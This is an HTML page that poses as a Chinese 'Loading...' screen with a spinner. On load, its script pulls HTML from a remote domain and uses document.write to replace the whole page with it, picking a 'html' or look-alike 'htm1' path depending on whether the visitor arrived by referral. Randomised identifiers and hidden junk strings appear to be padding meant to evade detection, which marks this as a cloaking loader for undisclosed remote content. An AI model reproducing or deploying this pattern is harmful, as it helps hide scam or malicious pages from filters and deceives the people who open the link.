<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .u6mNN8KNCJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .u6mNN8KNCJ .wZ2vTID {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .u6mNN8KNCJ .content {
            line-height: 50px;
            text-align: center
        }

        .u6mNN8KNCJ .img {
            width: 100%
        }

        .u6mNN8KNCJ .ptuXpweU {
            text-align: center
        }

        .u6mNN8KNCJ .ptuXpweU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .u6mNN8KNCJ .ptuXpweU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .u6mNN8KNCJ .ptuXpweU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .u6mNN8KNCJ .ptuXpweU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .u6mNN8KNCJ .ptuXpweU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .u6mNN8KNCJ .ptuXpweU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .u6mNN8KNCJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FG08G0LP5I4x(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fyXv9sU = FG08G0LP5I4x('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fyXv9sU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fyXv9sU +".html?a=share";
		}
		
        aQpX1zgXSA=url+"#"+new Date().getTime();
        aQpX1zgXSA && function() {
            $.get(aQpX1zgXSA, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<b style='display:none' >Y8Up8wDjgV6G6cWYiFcXb4dMpf0VAhZtMzbsEkub84kp6aBTxJKs3ZCguW21RGzw9Tt2E7DVr5wju3aut79L5v</b>
<div style='display:none'>sEN9baUSWt8kACXxz2qTQd10jZC5Vt5ah9zPdLdcbhljGyGoR9Lu3Zxrmzb</div>
<li style='display:none' >TIuhD2v8NHqyzlF6BT2VfM6R2UNrHUIa6sukrOQt5FK9kFAo8T9UqKTGs</li>
<ul style='display:none' >x5HXBFYcFYeFRo9cUMCCtGW1NpgirlbqXOtbn</ul>
<a  href='#' style='display:none'>FXL0q6XUuDWdTYDcZbQCtSVmFWxrDooHS9sduuvvP2Kffmqq4bpazc1a6nnb1</a>
<li style='display:none' >TIuhD2v8NHqyzlF6BT2VfM6R2UNrHUIa6sukrOQt5FK9kFAo8T9UqKTGs</li><div class="u6mNN8KNCJ">
    <div class="wZ2vTID">
        <div class="ptuXpweU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >is2eDmF4usG9fODi2yVYpcWvw7BpcNcBszpN6</ul>
<span style='display:none'>zWdrYmqSxfbDSYz</span>
<div style='display:none'>XWSgxITmRUyZhTSRrq4RaTbf6CORPgySDCTJUhIGEb6gTj6CeGbKMI3BvkVtLgoDh9ir5iW983a</div>
<div style='display:none'>XWSgxITmRUyZhTSRrq4RaTbf6CORPgySDCTJUhIGEb6gTj6CeGbKMI3BvkVtLgoDh9ir5iW983a</div></body>
</html>